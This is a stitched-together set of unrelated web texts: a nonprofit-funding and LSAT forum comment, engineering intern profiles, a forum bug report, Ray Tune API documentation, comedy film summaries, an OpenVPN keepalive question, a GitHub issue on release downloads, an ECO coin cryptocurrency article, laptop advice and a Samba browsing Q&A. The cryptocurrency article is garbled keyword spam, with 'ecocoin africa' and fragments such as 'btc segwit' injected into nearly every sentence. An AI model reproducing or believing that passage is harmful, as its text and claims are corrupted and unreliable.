cannot spend on itself--to hire good staff, to have good training, to use resources that cost money and save time, to plan its strategy and maintain regulatory compliance, to do whatever else an efficient organization needs to do--how can it possibly have the capacity to spend well on its programs? The money to sustain that charity is providing for its cause to be effectively addressed now and into the future. "Unrestricted" says that you believe GiveWell is competent to make these allocations correctly between itself and its recommended charities. For GiveWell in particular, if you do not believe they can do this, why do you think they can evaluate other charities' effectiveness? Presumably you want to give to the other charities because GiveWell has told you they are worth it, because you think GiveWell is competent at assessing organizational effectiveness. (For other charities, I would have lower expectations for assessment ability--but still I expect that I want to give to one in particular because it is effective at spending for its cause. There are few causes where you do not have much choice of how to direct your money to affect it. An effective one will be competent at running itself--not perfect surely, but competent enough that I don't think I will do a better job at allocating its funds than it will by giving a restricted donation.) Also, many people's gut feelings direct them to give restricted donations to avoid "wasting" their money; it's a feel-good option but one that does not help the charity stay around in the long term. People who are more considered should compensate for that by allowing the charity to use their funds unrestricted. I have no idea if GiveWell gets grants or not, but grant support from foundations is often restricted as well; it's much harder to get grants for general operating support. But I won't start that rant here. (For background, I've been heavily involved in nonprofits for the past 10 years, as volunteer, staff, and board.) Also, logical reasoning of the type on the test hardly showed up at all in law school--most of the reasoning required was not very complicated, so most reasonably intelligent college graduates would already be able to do it.. (Some more complicated logic showed up in Conflicts of Laws, also.) 1) I took it, but I didn't do much studying for it. (Basically, I signed up for it at nearly the very last moment after I saw someone mention that all it took to get into law school was a good LSAT--I had been pursuing a different career and had not previously thought of going to law school, but I had started doing legal-related work in a volunteer gig.) Maybe a week before the exam I went to the library and checked out a prep book. And the logic games section was already something I basically knew, so what I did spend time on was careful reading of the critical reading sections; I tend not to read carefully and miss instructions, and I wanted to learn the kinds of tricks they were likely to use to get me to do just that. 2 and 3) No; I used the logical reasoning skills I had already from studying math. (Also, from having taken every vaguely logic-related course at my undergrad.) Those were long-lasting. But I enjoyed math because many of those skills were already natural to me. I learned refinements and additional techniques and became better at it, but I was already inclined to thinking that way and enjoyed it. As a lawyer now, one of my major strengths lies in analytical reasoning--I like to consider situations and take apart the possible situations that may arise, what happens if they're taken to their logical conclusions, where contradictions might arise from sets of terms, what logical inconsistencies exist in a proposal. (The biggest and most enjoyable project I've worked on has been license drafting.)
OPCFW_CODE
For university students, an internship is a great opportunity to develop professional skills in the workplace. Setec welcomes students in engineering and electronics to get work experience at the company and plays a vital part in fostering innovative spirit of young professionals. Three of Setec interns are now full-time employees, sharing their stories with us. Hongli Wang, Electronics Engineer Hongli Wang, Master of Engineering in electrics and electronics, has graduated from the University of Melbourne. He spent three months at the company as a test engineer intern, and later on returned as a full-time employee. Hongli says to become an intern, you need to apply for internship program, satisfy some criteria including level of studies and average score, choose your field of interest, submit your CV and cover letter, and go through the interview process to secure placement as an intern. His first task at Setec was making a switchbox for testing purposes, so he had to use his knowledge in software, such as of Python scripts and setup of Linux system, and to acquire some new skills, like testing procedures, to perform this task. Currently Hongli is involved in developing computer vision for automatic testing. Instead of testing products manually, the company will use testing system which can run independently and generate report with information whether the product passes or fails the test. This will allow save time and further reduce possible testing errors. Hongli enjoys working at Setec’s R&D team, where everyone is very helpful and open to your ideas. Randi Noegroho, Electrical Engineer Randi Noegroho, Master of Engineering at University of Melbourne, had been studying electrical engineering. During the last semester of his studies, he chose industry based learning course which he hoped would provide him smooth transition from university to professional life, and became intern at Setec. Randi’s first task was testing of the battery management system, obtaining and analysing data on a daily basis. Randi says: “At university, you learn a lot of very important fundamental stuff, but it’s not enough. Communication is very important.” At Setec, he could get his hands on real life applications. Randi jumped at the opportunity to become a Setec employee because he realises that power electronics and control systems are a booming field, and he likes company’s culture. “All the people here are very supportive and encouraging. I am given big responsibility which pushes me further, so that I learn more and become a better person and professional”. Currently Randi is involved in multiple projects in challenging and dynamic word of R&D, and enjoys the diversity of his role. Muzammil Patel, Embedded Software Engineer Muzammil Patel is a fresh graduate from Swinburne University of Technology. During his three months as embedded software intern at Setec he made strong impression on the R&D team and was offered a contract to work on a new and exciting project currently run by the company. As an intern at Setec, Muzammil learned a lot of things that he could not get his hands on while studying, especially in software development. What do you like about working in R&D? Muzammil’s answer is “No one is constrained to their own work, people help each other anytime, you can always go and ask advice”. Muzammil is currently working on the project allowing to update firmware on the device via Bluetooth instead of updating it directly, which will allow to save time, money and resources. So if you are studying to be an engineer and looking at internship program, Setec could be a place for you.
OPCFW_CODE
- Go to the View Unread Content page. - Find a thread which has multiple pages and where the oldest unread post is not in the last page. - Click the link which brings you to the oldest unread post. - Don't continue to the last page of thread. - Reload the View Unread Content page again. - The thread does not appear in the list even though you haven't read the last page yet. "View Unread Content" does not handle multi-page threads nicely Posted 23 December 2010 - 05:16 PM Posted 02 February 2011 - 06:26 PM Here's what happened: - I went to the unread list. - I opened some of the links in new tabs. - I went to the second page of the unread list. - I went back to the first page. - I saw a thread (http://lavag.org/top...assing-cluster/) which had some new posts, but which I thought might have too many new posts. - To check whether it was too long, I right clicked the OOP forum name next to the topic title and opened the forum in a new tab to see when the topic was started. - At the same time, I refreshed the unread list page. - When I looked at the other tab, the thread was marked as read and it no longer appeared in the unread list. Posted 16 August 2011 - 07:52 AM Posted 16 August 2011 - 11:34 PM In any case here's a link to the initial release notes. And the subsequent bug fix release. If you want to post this directly to their bug tracker go here. Not sure if you can do this if you're not a customer but give it a shot. Posted 17 August 2011 - 07:41 AM Before I post this on their forums, I want to be sure we actually have the latest version. That's 3.2.0, right? Posted 02 October 2012 - 10:56 AM There's a thread with 4 new replies on page 1 and 8 new replies on page 2, for a total of 12 unread replies. If I click the First Unread Post bullet and don't go into page 2 manually, the topic disappears from the new content list, even though I haven't actually read page 2. If I just click the page 1 link in the new content list, the topic stays in the list until I actually go into page 2. Posted 14 December 2012 - 09:18 PM Posted 16 December 2012 - 09:07 AM
OPCFW_CODE
- class ray.tune.syncer.SyncConfig(upload_dir: Optional[str] = None, syncer: Optional[Union[str, ray.tune.syncer.Syncer]] = 'auto', sync_period: int = 300, sync_timeout: int = 1800, sync_on_checkpoint: bool = True)[source]# Configuration object for Tune syncing. See Appendix: Types of Tune Experiment Data for an overview of what data is synchronized. upload_diris specified, both experiment and trial checkpoints will be stored on remote (cloud) storage. Synchronization then only happens via uploading/downloading from this remote storage – no syncing will happen between nodes. There are a few scenarios where syncing takes place: The Tune driver (on the head node) syncing the experiment directory to the cloud (which includes experiment state such as searcher state, the list of trials and their statuses, and trial metadata) Workers directly syncing trial checkpoints to the cloud Workers syncing their trial directories to the head node (this is the default option when no cloud storage is used) See How to Configure Storage Options for a Distributed Tune Experiment? for more details and examples. upload_dir – Optional URI to sync training results and checkpoints to (e.g. hdfs://path). Specifying this will enable cloud-based checkpointing. syncer – If upload_diris specified, then this config accepts a custom syncer subclassing Syncerwhich will be used to synchronize checkpoints to/from cloud storage. If no upload_diris specified, this config can be set to None, which disables the default worker-to-head-node syncing. Defaults to "auto"(auto detect), which assigns a default syncer that uses pyarrow to handle cloud storage syncing when sync_period – Minimum time in seconds to wait between two sync operations. A smaller sync_periodwill have more up-to-date data at the sync location but introduces more syncing overhead. Defaults to 5 minutes. Note: This applies to (1) and (3). Trial checkpoints are uploaded to the cloud synchronously on every checkpoint. sync_timeout – Maximum time in seconds to wait for a sync process to finish running. This is used to catch hanging sync operations so that experiment execution can continue and the syncs can be retried. Defaults to 30 minutes. Note: Currently, this timeout only affects cloud syncing: (1) and (2). sync_on_checkpoint – If True, a sync from a worker’s remote trial directory to the head node will be forced on every trial checkpoint, regardless of the sync_period. Defaults to True. Note: This is ignored if upload_diris specified, since this only applies to worker-to-head-node syncing (3). PublicAPI: This API is stable across Ray releases.
OPCFW_CODE
Although comedy is highly subjective, critics and viewers agree that some comedy films belong in every DVD collection. You can find a variety of comedy DVDs on eBay. Before shopping, learn about the top three comedies of all time. 'Monty Python and the Holy Grail' 'Monty Python and the Holy Grail' is a 1975 home-grown comedy by the Monty Python group of Graham Chapman, John Cleese, Terry Gilliam, Eric Idle, Terry Jones, and Michael Palin. They created the film during a break between series three and four of 'Monty Python's Flying Circus'. This is the group's first full-length film, and it is a cult classic. King Arthur and his squire Patsy, en route to Camelot, recruit the Knights of the Round Table: Sir Galahad the Pure, Sir Bedevere the Wise, Sir Lancelot the Brave, and Sir Robin the Not-Quite-So-Brave-As-Sir-Lancelot. Upon reaching Camelot, God instructs them to seek the Holy Grail. After attempting an attack on a French-controlled castle, the group separates and each knight embarks on his own quest to seek the Holy Grail. 'Airplane!' is a 1980 American film starring Robert Hays and Julie Hagerty. It is a farcical parody of the disaster film genre, specifically 'Zero Hour!' and 'Airport 1975'. Traumatised war veteran, ex-fighter pilot, and taxi driver Ted Striker suffers from fear of flying and cannot hold a job. His flight attendant girlfriend, Elaine Dickinson, leaves him, and he boards a Boeing 707 from Los Angeles to Chicago in the hopes of winning her back. After dinner, numerous passengers and the cockpit crew fall ill. It is up to Hays to land the plane and save the passengers and crew. Mel Brooks's 'Blazing Saddles' is a satirical Western starring Cleavon Little and Gene Wilder. Brooks, Andrew Bergman, Norman Steinberg, Al Uger, and comedic legend Richard Pryor wrote the script. The 1974 film satirises racism masked by Hollywood versions of the Wild West, and the hero is a black sheriff in a white town where everyone's surname is Johnson. The government plans to build a railroad through the town of Rock Ridge, and State Attorney General Lamarr intends to drive out the townsfolk to buy their property cheaply. When he sends a gang of thugs to drive the inhabitants of Rock Ridge away, the people demand that the governor appoint a sheriff. Lamarr convinces the governor to appoint Bart, a black railway worker about hang, in an effort to offend the townspeople to make them leave or to make them lynch the sheriff and allow him to take control of the town.
OPCFW_CODE
Code: Select all port 1194 proto udp dev tun ca /etc/openvpn/keys/ca.crt # generated keys cert /etc/openvpn/keys/myserver.crt key /etc/openvpn/keys/myserver.key # keep secret dh /etc/openvpn/keys/dh4096.pem crl-verify /etc/openvpn/keys/crl.pem server 192.168.12.0 255.255.255.0 # internal tun0 connection IP ifconfig-pool-persist ipp.txt keepalive 600 1800 comp-lzo # Compression - must be turned on at both end persist-key persist-tun status /var/log/openvpn/status.log verb 3 link-mtu 1602 cipher AES-256-CBC auth SHA512 keysize 256 push "dhcp-option DNS 192.168.12.1" push "redirect-gateway" Code: Select all client remote 220.127.116.11 cipher AES-256-CBC comp-lzo yes dev tun proto udp nobind auth-nocache script-security 2 persist-key persist-tun user nobody group nobody link-mtu 1602 auth SHA512 keysize 256 keepalive 600 1800 This setting is being honored on regular Linux OpenVPN clients, but not on OpenVPN connect on Android, although the log says so. Here's a summary of events seen from the client (see pictures below for details - I don't know how to save the log as text file): 19:55:46 OpenVPN start / unused option keepalive (I've put this in the client config, but this is not used apparently.) 19:55:49-54 Verify/TLS stuff 19:55:55 Sending PUSH_REQUEST replied with ping=600, ping-restart=1800 (looks good!) 19:59:21 "Session invalidated: KEEPALIVE_TIMEOUT" & Disconnected. <-- what? only 210 seconds have passed! Server version: 2.1.3 x86_64-pc-linux-gnu (Debian version 2.1.3-2+squeeze1) Client version: 1.1.12 build 45 (OpenVPN Connect from Google Play) Android version: 4.2.2 (Paranoid Android 3.69) How can I prevent OpenVPN from disconnecting on inactivity so while I configured it appropriately?
OPCFW_CODE
ImageIcon doesn't show up on top left app window I have this code: public DesktopApplication1View(SingleFrameApplication app) { super(app); pbu.registriere(this); ImageIcon icon = new ImageIcon("resources/BilKa_Icon_32.png"); this.getFrame().setIconImage(icon.getImage()); initComponents(); I'm wondering why the image icon doesn't show up on the top left of the app window. It's still the Java cup of coffee logo instead. What might be wrong? is icon.getImageLoadStatus() == MediaTracker.COMPLETE your question might be a duplicate of: http://stackoverflow.com/questions/7194734/setting-application-icon-in-swing not really, because in this case I have nothing to do with JFrame I tried that, I do not also, I don't know where is problem, but sometimes look here one from authors of this Framework, maybe give us answer :-) this.getFrame() is returning either an instance of Frame or JFrame. You described your question as being swing in both the title and tags, it is not an unreasonable assumption that your frame is a JFrame rather than an AWT Frame. One likely possibility is your resource path could be incorrect. Depending on what your file hierarchy, and whether your class files are in a jar, etc. you might need a "/" at the beginning of the path before the res to make the path absolute instead of relative. Tutorial: http://download.oracle.com/javase/1.5.0/docs/guide/lang/resources.html If you are fairly confident you are reading the image correctly (a good test would be to make a dummy component inside your window and see whether you can load the image into that), you should look into following through the Frame/Top Level Window Tutorial, particularly the parts about window decorations. In particular, one thing you may not be doing (I can't tell from your snippet) is that it appears you might need to set JFrame.setDefaultLookAndFeelDecorated(true); before the frame is created...which you would not be able to do using this.getFrame(), but need to do somewhere earlier in your initialization code. everything seems correct including the resource path, because on another box I set an Image on the same folder (resource) and I use the same writing are you on a case-sensitive OS? I do notice you have capital letters in your image filename. JFrame frame = new JFrame("FrameDemo"); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); JLabel emptyLabel = new JLabel(""); emptyLabel.setPreferredSize(new Dimension(175, 100)); frame.getContentPane().add(emptyLabel, BorderLayout.CENTER); frame.setIconImage(new ImageIcon("/resources/BilKa_Icon_32.png").getImage()); I have put those inside the class, yet a new window popped up but still the icon of the new window didn|t change as well. Did you test the demo project from the new window tutorial? Does it work for you? It works for me on my machine. If it works, that narrows down the problem to something in your code, vs. window decorations don't work on your OS/java version/etc. The source code is linked from that tutorial, just need to create the package (and optionally add a jpg) and compile/run: http://download.oracle.com/javase/tutorial/displayCode.html?code=http://download.oracle.com/javase/tutorial/uiswing/examples/components/FrameDemo2Project/src/components/FrameDemo2.java Mike K is right, ImageIcons can be loaded dynamically, and images can have a zero size when they are first initialised. Also note that in Unix and in a JAR, the names are case sensitive. try this: try{ ImageIcon icon = new ImageIcon("resources/BilKa_Icon_32.png"); MediaTracker mt=new MediaTracker(this); mt.addImage(icon.getImage(),0); mt.waitForAll(); this.getFrame().setIconImage(icon.getImage()); }catch(InterruptedException excp){} -- OK apologies I have edited the addImage - it takes an extra parameter ID which can be any number. As to your error "no such constructor", it is telling you that you need to pass a Component to the constructor. Your app window is a component, so you should pass that here as a parameter. I used this because most people put this code inside the class that extends Frame, Window or JFrame. So use MediaTracker mt=new MediaTracker(this.getFrame()); I got this error: The Constructor MediaTracker(DesktopApplication1View) is undefined. And I need one more parameter for mt.addImage
STACK_EXCHANGE
Delay of events detection dependent of "MouseDown" position Let's say we have a Rectangle with color which depends of CurrentValue["MouseOver"]: Deploy@Framed@Graphics[ Dynamic @ {If[CurrentValue["MouseOver"], Red, Green], Rectangle[]} , ImagePadding -> 10] With cursor over the Rectangle[] the color switches to Red as expected, also if one put the "MouseDown" and drag it around it is still Red, however if you put the "MouseDown" outside the rectangle, on the padded area, and drag it to the rectangle it will not switch the color till "MouseUp". Is there any way to avoid such behaviour in general? I can create some workarounds for particular situations but I'm looking for a general solution. I was thinking about EventHandler's PassEvents options but it seems it is a deeper problem (I've failed with this approach :)). It looks like the problem is the "MouseDown" event is blocking some functions, for example: Dynamic@CurrentValue["ControlKey"] is not working while the mouse button is down. I've faced it before with MouseAppearance: Problem MouseAppearance updating while “MouseDown” It doesn't switch until MouseMoved after MouseUp. It's as if MouseMoved and MouseDragged are mutually exclusive, and MouseOver is only updated on MouseMoved? @TimothyWofford I do not see this, only MouseUp is enough for switch in my case, maybe it's OS dependent? It seems rather that MouseDown is blocking some events detections, try: Dynamic@CurrentValue["ControlKey"] and press Ctrl when the Mouse is down. @Kuba I belive that dynamic interactivity in general is halted during mouse down, at least that has always been my experience (With slider interactions and such being excluded). For instance try DynamicWrapper[ Dynamic[t], Refresh[t = AbsoluteTime[], UpdateInterval -> 0.1] ], and press the mouse button. Original (incorrect) answer When you press in the white area and drag into the green square, you begin a selection just like when you select objects for copy-paste operations. The workaround I propose is to prevent the selection process to begin in the first place. First way: Create the cell with the option Selectable -> False CellPrint@Cell[BoxData[ToBoxes@ Deploy@Framed@Graphics[ Dynamic@{If[CurrentValue["MouseOver"], Red, Green], Rectangle[]}, ImagePadding -> 10] ], Selectable -> False] Second way: If the cell is already created, press Ctrl+Shift+E and edit the cell options to include Selectable -> False, press Ctrl+Shift+E again. Update The following code should produce the result you want: CellPrint@Cell[BoxData[ToBoxes@ Framed@Graphics[ Dynamic@{If[CurrentValue["MouseOver"], Red, Green], Rectangle[]}, ImagePadding -> 10] ], Selectable -> False] Mmm ... it works only if you begin from outside the padded area. So, the above is not an answer, yet. I have updated the answer. @Hector now it works :) thanks, it seems Deploy is messing around a little. @Kuba: the strange thing is that Deploy is supposed to disable selection. @Kuba: I think the problem is that ContentSelectable -> False does not change the properties of the frame. @Hector It seems it is really what it is all about. It even helps with DynamicWrapper[ Dynamic[t], Refresh[t = AbsoluteTime[], UpdateInterval -> 0.1] ]
STACK_EXCHANGE
By Gardalkis - 17.04.2020 As part of its plans to make Africa a more integrated continent, leaders of the Economic Community of West African States (ECOWAS) have. In , the region is set to get a long-discussed new currency: the Eco. Many Africans are pleased — but there is a lot of work ahead, say. Twitter How can we design ecocoin africa cryptocurrency for the better of humanity and ecology? In this last chapter of the crypto deep dive serieswe will dissect two kinds of blockchain cryptocurrencies that are currently making waves on https://tovar-id.ru/btc/como-comprar-e-vender-btc.html internet and beyond. Ecocoin africa, we ecocoin africa the ecocoin africa of the ECO Coin framework that intends to bring humans a democratic system - with ecocoin africa trees - into this sustainable, communal cryptocurrency. Blockchain technology has only been around for ten years. It was only in when Satoshi Nakamoto released ecocoin africa Bitcoin white paper. To put it in perspective: this means that cryptocurrency technology is about as old as the first iPhone. However, in these ten years Ecocoin africa, Ethereum and ecocoin africa cryptocurrency technologies have continue reading changed the way in which we look at money. Traditional money is always bound to either national or supranational organs that have a rigidly structured political and legal framework. However, in the blockchain world, these legal and political frameworks are way less elaborate or sometimes even non-existent.What is the New ECO Currency?? How will it Affect Africa? The sheer possibility of having money that is ecocoin africa, ungovernable btc segwit ecocoin africa segwit often not taxable is a seismic shift in terms of monetary development. All of that has happened in the course ecocoin africa ten years. A promising start, leaving us wondering: what may be coming in the future? That blockchain system is simply not built yet, but Ecocoin africa coin is making steps towards building it. Luckily for ECO coin, we are not the only ones to pursue sustainable blockchain technology. We have peers and potential partners that we can learn from. Ecocoin africa that are developing their own platform s in the same, bottom-up way that ECO coin ecocoin africa trying to do. Ecocoin africa this final story in the crypto-deep dive series, we will explore two examples of currencies that the ECO-coin is drawing inspiration from, and we explore the framework of the soon to be used ECO coin. Tokens: a ecocoin africa representation of human data Besides cryptocurrency money there are also cryptographic tokens. In this world, a world ecocoin africa is not focused on big-money and system-wide revolution, there are many interesting things happening that ECO coin can learn from. Cryptographic tokens are a form of digital payment currency that can resemble any real-world asset and anything that generates more data or money on behalf of the token holder. Interest or dividends earned can ecocoin africa tokenized and subsequently shared as well. The person holding the tokens will automatically receive all interests and dividends connected to it. So how ecocoin africa these tokens work on the practical level? The word nest egg has the connotation of ecocoin africa sum of money that is saved for the future. In essence, NestEgg is a platform that aims to build sustainable energy infrastructure without direct more info ecocoin africa pro setup from governments ecocoin africa real estate investors. Users ecocoin africa money into the platform, which NestEgg ecocoin africa to build infrastructure like for example a windmill and in return, users get a cryptographic token which is their proof of having invested into the infrastructure. Users can claim through the NestEgg platform after btc ecocoin africa bittrex infrastructure project is built. NestEgg, in essence, is a way to democratise pension investment. When young people invest into it now, they here a way of saving up for their own retirement, fully outside of traditional pension funds. We should be looking to integrate these tokens for things that are not articulated within our current, dominant economic framework of fiat money. The most applicable articulation of this research, is of course, ecological value. ECO coin was majorly inspired by this approach of using digital currencies for investing into your own pension read: the far future. In a way, https://tovar-id.ru/btc/btc-to-hit-100k.html can compare an ecocoin africa into the ECO coin platform as an investment into the future. People will also begin believing in the future again, where we can live together with both our ecosphere and technosphere in a great symbiosis. Money: better when spent Another inspiring example, this time in the category of money, is the FreiCoin project. So why is that a good and ecocoin africa thing? The project ecocoin africa the concept of a demurrage fee, which in the ecocoin africa of physical money was a kind of service fee that you would pay to the banker stores and safeguards your gold. A service fee, if you will. More like this In the FreiCoin project, however, demurrage fees are actively implemented to make it less attractive to hold an amount of FreiCoin for a ecocoin africa period of time, and more attractive to spend your money. As such, currencies that decay in ecocoin africa currencies with a very high deflation rate have the possibility of leveling out the economic field when they are adopted on a ecocoin africa scale. Those investments ecocoin africa benefit everyone in that link, instead of just the capital holders. These are the kinds of solutions that are ecocoin africa to ecocoin africa at in the span of a years. Therefore the ECO coin has chosen to ecocoin africa this structural incentive of a demurrage fee to incentivize users to spend source coins at partners as quickly as possible instead of doing the hodl that many crypto investors do. The future of the ECO Coin Making this technology it ecocoin africa more rooted in nature: the value of ECOs represent the decaying value of trees, since trees mature and die over time, ecocoin africa. The framework of the ecocoin So how are we going to use cryptocurrency technology for ecocoin africa better of humanity? The eco coin will be an investment in humanities future, generating ecological dividends over time. Within the framework of the ECO coin, which will be alive within the blockchain go here of the years to come, we also aim to ecocoin africa change the root of blockchain technology btc top shop include humans into the equation, as well as ethics. They literally keep the blockchain afloat by verifying that sustainable actions took place, introducing and training new ECO inspectors and managing the escrowed trees by confirming that these trees are still standing at the given location. In addition, giving ecocoin africa task to humans, instead of to computer power, may prove to make this currency less energy intensive. Moreover, ecocoin africa and self-regulation are a big problem in current blockchain networks as well as a big question for regulating bodies. The ECO coin is making people work towards the same collective goal of doing more sustainable actions and treating the planet well. Claiming your business Listing The regulating body, the ECO coin team, can only point in the direction of a solution, but it is building systems that outsource decisionmaking on the environmental questions and uncertainties towards its community of users. A Decentralised Autonomous Charity, a digital agora. We are working on the voting system as we speak and users will be ecocoin africa to vote ecocoin africa the app ecocoin africa easily. All together, eco coin team, the eco inspectors, and the voting community will work towards a system where ECO ecocoin africa can only be spent on sustainable products, thereby changing our consumption habits. Therefore, a thorough dive into into ecocoin africa supply chain and production methods of the companies ecocoin africa want to partner ecocoin africa order to verify that they are, indeed, selling good, sustainable produce ecocoin africa should be exchangeable for ECO coins. Because the blockchain will be public and vendors are identified, funding bad ideas using ECO coins will be nearly impossible to do. And this is also strongly de-incentivised by the network as a 1 dash berapa btc, ecocoin africa ECO coins can only be spent at certified vendors. Nature is to be hard-wired ecocoin africa our technology On top of that, any ECO coin is not just a superficial number on a blockchain, but it stands for an actual, living tree somewhere in the world.WHAT IF WEST AFRICA OR ECOWAS WAS A COUNTRY? As such, the network is literally pegged ecocoin africa real-world trees, who back this new cryptocurrency with something that has tangible value. The Ecocoin africa coin trees ecocoin africa the physical representations of the digital network. With the ECO coin, a part of our ecology trees will be hard-wired into the technological world of the future. That is ecocoin africa to Nature, pur sang. This was the last story of the crypto deep dive seriesin which we immersed ourselves into the crypto world to explore the ecocoin africa for the ECO coin. Want to learn more? Visit the ECO Coin websitewhere we will soon publish the technical paper. Enjoying this story? Show it to us! - stella coin price - buy bitcoin with poli - bitcoin exchange sites - paxful amazon gift card - requirements to open coinbase account - dogecoin buy sell - history of money bitcoin - how to buy bitcoin through atm - crypto hd wallpaper - etherscan api python - braavos play - lolli app stock - 0 85 btc to usd - bitpay card activate
OPCFW_CODE
Unable to retrieve artifacts where the version is not embedded in the artifact name This snippet works when pulling jaxxstorm/connecti but not another private project. Seems to be the lack of the version/tag embedded in the artifact name. (owner and repo redacted as I'm not sure of the privacy issues) ##[debug]Loading env Run<EMAIL_ADDRESS> searching for REPO_darwin_amd64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_darwin_arm64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_linux_386 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_linux_amd64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_linux_arm64 with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_windows_386.exe with linux.(x64|amd64).*.(tar.gz|zip) searching for REPO_windows_amd64.exe with linux.(x64|amd64).*.(tar.gz|zip) Error: Could not find a release for v0.1.1. Found: REPO_darwin_amd64,REPO_darwin_arm64,REPO_linux_386,REPO_linux_amd64,REPO_linux_arm64,REPO_windows_386.exe,REPO_windows_amd64.exe ##[debug]Node Action run completed with exit code 1 ##[debug]Finishing: Download REPO binary Using jaxxstorm/connecti as a working template, I can see the version info using: [I] ➜ gh --repo jaxxstorm/connecti release view v0.0.3 v0.0.3 jaxxstorm released this about 1 day ago Assets connecti-v0.0.3-darwin-amd64.tar.gz 25.19 MiB connecti-v0.0.3-darwin-arm64.tar.gz 25.26 MiB connecti-v0.0.3-linux-amd64.tar.gz 25.35 MiB connecti-v0.0.3-linux-arm64.tar.gz 24.21 MiB connecti-v0.0.3-windows-amd64.zip 25.56 MiB connecti-v0.0.3-windows-arm64.zip 24.48 MiB connecti_0.0.3_checksums.txt 606 B View on GitHub: https://github.com/jaxxstorm/connecti/releases/tag/v0.0.3 There's a private repo I'm trying to pull a release artifacts for that has multiple releases: [I] ➜ gh --repo OWNER/REPO release list v0.1.1 Latest v0.1.1 2022-12-01T17:57:45Z v0.1.0 v0.1.0 2022-06-01T23:38:43Z v0.0.26 v0.0.26 2022-05-23T09:56:44Z v0.0.25 v0.0.25 2022-02-23T19:57:25Z v0.0.24 v0.0.24 2022-01-12T11:50:10Z v0.0.23 v0.0.23 2021-12-17T19:02:41Z v0.0.22 v0.0.22 2021-12-09T12:56:35Z v0.0.21 v0.0.21 2021-11-10T13:52:44Z v0.0.20 v0.0.20 2021-11-09T11:46:10Z v0.0.19 v0.0.19 2021-10-07T11:35:22Z v0.0.18 v0.0.18 2021-09-22T11:32:07Z v0.0.17 v0.0.17 2021-08-19T11:44:02Z v0.0.16 v0.0.16 2021-03-29T08:53:32Z v0.0.15 v0.0.15 2021-03-25T09:32:00Z v0.0.14 v0.0.14 2021-03-23T13:53:21Z v0.0.13 v0.0.13 2021-03-18T16:00:18Z v0.0.12 v0.0.12 2021-03-09T11:49:04Z v0.0.11 v0.0.11 2021-02-16T14:03:35Z v0.0.10 v0.0.10 2021-02-10T13:05:03Z v0.0.9 v0.0.9 2021-02-05T11:20:02Z v0.0.8 v0.0.8 2021-02-04T13:55:45Z v0.0.7 v0.0.7 2021-01-29T19:30:22Z v0.0.6 v0.0.6 2021-01-29T17:18:05Z v0.0.5 v0.0.5 2021-01-27T11:24:17Z v0.0.4 v0.0.4 2021-01-21T12:31:32Z v0.0.3 v0.0.3 2021-01-21T09:15:10Z v0.0.2 v0.0.2 2021-01-19T18:13:43Z v0.0.1 v0.0.1 2021-01-16T01:37:00Z From which I can query individual repos, but the releases don't embed the name: [I] ➜ gh --repo OWNER/REPO release view v0.1.1 title: v0.1.1 tag: v0.1.1 draft: false prerelease: false author: XXXX created: 2022-12-01T17:56:53Z published: 2022-12-01T17:57:45Z url: https://github.com/OWNER/REPO/releases/tag/v0.1.1 asset: REPO_darwin_amd64 asset: REPO_darwin_arm64 asset: REPO_linux_386 asset: REPO_linux_amd64 asset: REPO_linux_arm64 asset: REPO_windows_386.exe asset: REPO_windows_amd64.exe -- **Full Changelog**: https://github.com/OWNER/REPO/compare/v0.1.0...v0.1.1 I believe this is solved as of the latest version, can you try updating? I apologize, but I can't confirm as I'm no longer using this action. I switched to using: gh --repo <owner/repo> release download --pattern "linux_amd64" ${{ env.XXX_VERSION }} If it's supported now, I would just close it.
GITHUB_ARCHIVE
A friend recently asked me what laptop to get after his had died (fortunately no data was lost – clever man!). His question was really “Windows or Mac”? The requirements were photos, email, music, Office. It is an oft asked question, so I thought I would post my reply. How old is the laptop? I ask because there are three possibilities to consider, based on available finances. - The cheapest option is to keep the laptop and install Ubuntu on it. They are about to release the Disco Dingo (next week), though you can install Cosmich Cuttlefish (current release) now and then upgrade. Of course, it is a new environment to learn, but the benefits are: - It is a free option, and Ubuntu comes with all the software you need, along with reguar free updates - Ubuntu works nicely on lower powered hardware, and you can even have versions that will work on really really old hardware (e.g. ½ gig RAM) - You won’t need a new laptop, though depending on the problem that occurred you might want to replace the hard disk - You can install Ubuntu on a memory stick and then boot from that to try before you install - Ubuntu has become much easier to use and more stable over the years, and now looks pretty great - Personally I don’t think you need to bother with AV. I know purists will say that you always need AV, but Linux is inherantly more secure and I have never had a problem with viruses on Linux - The mid range option is to buy a new Windows laptop. Personally I don’t like Windows. You would then need to ensure you have the correct Office licenses installed (unless, of course, you opt for a free office solution such as Libre Office, the one that comes with Ubuntu). You would also need to ensure the new laptop has a DVD player, or you have an external USB-enabled one: a lot of new laptops no longer have these. - A familiar operating environment - I can’t think of another, if you have the specific requirements you mentioned and are not after some esoteric piece of software that only works for Windows - The high end option is to buy a Macbook. This will be more expensive than Windows (unless you aim for a high end Windows machine, where prices are suprisingly similar). Macbooks do not come with DVD players so you would need to have software based files to play or an external DVD player. - I personally love the build quality, though some people do complain about the keyboard (since they are so thin, Apple changed the mechanism and this is not to everyone’s taste. Best try before you buy) - The OS is more stable than Windows - You won’t need to buy MS Office. You can, of course, but Apple’s Office system is supplied and is very good - Personally I don’t think you need to bother with AV. I know purists will say that you always need AV, but Unix is inherantly more secure and I have never had a problem with viruses on my Macs
OPCFW_CODE
The questions and answers given in this section are designed to highlight important aspects of Microsoft Windows networking. What is the significance of the MIDEARTH< 1b > type query? This is a broadcast announcement by which the Windows machine is attempting to locate a Domain Master Browser (DMB) in the event that it might exist on the network. Refer to TOSHARG2, Chapter 9, Section 9.7, "Technical Overview of Browsing," for details regarding the function of the DMB and its role in network browsing. What is the significance of the MIDEARTH< 1d > type name registration? This name registration records the machine IP addresses of the LMBs. Network clients can query this name type to obtain a list of browser servers from the master browser. The LMB is responsible for monitoring all host announcements on the local network and for collating the information contained within them. Using this information, it can provide answers to other Windows network clients that request information such as: The list of machines known to the LMB (i.e., the browse list) The IP addresses of all domain controllers known for the domain The IP addresses of LMBs The IP address of the DMB (if one exists) The IP address of the LMB on the local segment What is the role and significance of the < 01 >< 02 > __MSBROWSE__ < 02 >< 01 > name registration? This name is registered by the browse master to broadcast and receive domain announcements. Its scope is limited to the local network segment, or subnet. By querying this name type, master browsers on networks that have multiple domains can find the names of master browsers for each domain. What is the significance of the MIDEARTH< 